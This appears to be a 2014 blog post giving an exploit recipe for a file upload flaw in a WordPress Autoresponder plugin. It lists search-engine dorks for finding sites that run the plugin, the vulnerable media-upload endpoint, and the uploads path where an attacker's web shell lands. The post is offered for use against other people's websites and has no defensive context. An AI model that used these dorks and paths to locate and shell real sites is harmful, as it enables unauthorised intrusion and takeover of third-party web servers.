Monday, 12 May 2014

Exploit WordPress : Autoresponder Plugin - File Upload Vulnerability



This exploit is almost the same as the previous exploit that i posted, OptimizePress Theme, so i'm just gonna give you the dorks and vulnerable path.

DORK: inurl:/autoresponder/jscolor/
             inurl:/wp-content/plugins/autoresponder/jscolor/
     
EXPLOIT: /wp-content/plugins/autoresponder/media-upload.php

SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id.php